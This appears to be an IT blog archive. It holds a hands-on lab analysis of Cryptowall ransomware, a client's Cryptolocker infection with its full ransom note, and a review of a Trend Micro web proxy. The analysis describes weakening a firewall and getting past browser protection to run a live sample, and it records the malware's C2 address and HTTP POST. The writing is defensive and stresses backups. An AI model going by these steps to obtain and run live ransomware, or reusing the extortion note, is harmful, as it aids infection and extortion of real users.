Think before you click !
Archive for category IT
No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt, wireshark for packet sniffing and Sysinternals Process Monitor.
So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URL’s faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.
So I had to bypass the built in Internet Explorer protection (It also wanted to kill my download) and finally I have Document-128_712.zip. I extracted out the contents. Document-128_712.scr with a PDF icon. I double click the screensaver file (Executable in disguise) and the file vanished. The mouse moves to an hourglass for a second and then nothing. I refer to the wireshark and process monitor. They are blitzing past recording data.
There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.
As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub folders and then I created a folder called “a” as in C:\a. It is safe as the process does not seem to double back once it has passed a letter of he alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.
So here is the Scr file, renamed into bd99547.exe. Is is the same file as Document-128_712.scr as the hashes are the same. It is in the startup group so it you restart your pc, it continues to encrypt.
Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.
So I let this thing continue on and do it’s job. The file exe file located in the startup startmenu category and on C:\ will vanish later. I watch as Process Monitor shows me the “exe” file I ran, using Windows built in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft have already provided everything it needs. It is using Microsofts own tools to hold us ransom.
I watch it connect to 18.104.22.168 and do a HTTP post. This server is called babyslutsnil.com
POST /da2c5yzx438 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
title 500 Internal Privoxy Error /title
link rel=”shortcut icon” href=”http://config.privoxy.org/error-favicon.ico” type=”image/x-icon”> /head
h1 500 Internal Privoxy Error /h1
pPrivoxy encountered an error while processing your request:/p
pbCould not load template file codeforwarding-failed/code or one of its included components./b/p
p Please contact your proxy administrator./p
p If you are the proxy administrator, please put the required file(s)in the code i (confdir) /i /templates /code directory. The location of the code i (confdir) /i /code directory is specified in the main Privoxy code>config/code file. (It’s typically the Privoxy install directory, or code/etc/privoxy//code)./p
I can only assume it is trying to send out the RSA encryption key to the remote server.
Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).
Then you find a key in the registry which starts off the same as the exe file name
and then the exe’s start to vanish and are replaced with the warnings you will see next reboot.
Then you get invited to go up, pay some money, download another exe file (Do you trust it?) with the decryption and away you go !
It uses the TOR network for the website so there is no way to track these guys. They are annonymous and invisable.
Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.
Final step, FORMAT THE MACHINE. My packet Sniffs and Process monitoring has shown me that this Malware gets all over your PC.
Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!
Moral: Have offline current backups !
Remote access for file shares on servers still works. Sharepoint, Exchange and other services are unaffected. It is just the Explorer Windows on the local server console (Which is used for the Browse feature or File explorer /My Computer).
If you open the Disk Management before inserting the drive, you note that a volume comes up, then it all stalls and the disk is not allocated a drive letter for 10 minutes.
From a command prompt, if you try and move to that disk, it stalls. If you try a non existant disk, it comes back “drive not found”. In this way I know I can navigate using CMD and switch between drive letters to valid letters, just not this new volume. It seems the drive has started allocating resouces but it is not yet available for use.
If during this time you try and stop the Trend Agent – real-time scan service, it hangs whilst stopping until the 10 minutes is up.
If we halt that service first, USB drives go in and out as normal. If we do not halt it or it restarts, when inserting a drive, Explorer hangs again for 10 minutes.
After 10 minutes, the drive volume appears, Explorer responds and everything goes back to normal.
There are no events recorded in the EventLog
Yes, again we see Cryptolocker. My client emailed me the following “I received an email on Friday from Energy Australia that took me to a website and it asked me to run a program but I could not open anything I believe that email may have caused this issue if that is of any help”
This falls in line with other peoples observations i.e. http://blogs.appriver.com/Blog/bid/102814/New-CryptoLocker-Has-a-Walkabout
We have not yet worked out how this version works nor what files have been affected. Here is the text
!!! YOUR SYSTEM IS HACKED !!! All your files was encrypted with Cryptolocker! This means that without the decryption key the recovery of your files is not possible, If your files have a value to you and you are willing to pay me for the decryption key please contact me: email@example.com You have 3 days to pay for my services. After this period, you will lose all your files. Anti-virus software can remove Cryptolocker, but can not decrypt your fles. The only way to recover your files -is to pay for the decryption key. Information for IT-specialist: Data was encrypted with AES (Rijndael) algorithm with the session key length if 256 bits. Session key is encrypted with RSA (2048 bits) algorithm. Public-key is enclosed into Cryptolocker. Private-key for decryption of the session key is stored only in my database. To crack this key, you will need more than a million years time.
Here is a photo
This is the nasty email that began it all
Along comes Trend Worry Free Professional which allows you to setup your browser to the external proxy in Trend Micro’s Amazon cloud.
You can setup Ldap integration with your AD and then after the staff have used it, do reports on their activity.
This all sounds really nice.
So what are the real world issues with this product?
- Using it from South Australia and using Proxy servers on the eastern side of Australia, my latency is huge. It adds 30 ms. A slow ADSL2+ connection feels this badly. All my pages are delayed and slow coming up. The experience over fibre or in the eastern states is far less exaggerated.
- I keep getting certificate popups. I get it for my email (Especially using Office 365), I get it for many of the HTTPS sites I use.
- The proxy settings are easy to tamper with. Unless you lock IE settings down or force the settings via Group policy, users can bypass the proxy.
- I have a few websites that “sometimes work”. One happens to be my webmail. The experience is very hit and miss with the proxy turned on.
- The built in reports are very basic. They don’t give me enough detail.
Ok, this all sounds really bad. Yes, there are some teething issues and the latency is killing me so why do I love this product ?
- It filters all my outbound web traffic and removes Malware and viruses instantly as discovered.
- I can dump the raw logs into Excel an do my own reports.
- I can have external roaming users logged into this no matter where they are in the world.
- I have control of what happens on the network.
So if you have Fibre, are in the eastern states or have a client with very little expectations (maybe they are not a big internet user) then this is an awesome tool.
If you are a geek like me, you have to work out if the tool makes your habits safer and live with it, or forge ahead as the speed annoyed you and run other protection.
Don’t forget, this is only version 1, future advancements will help.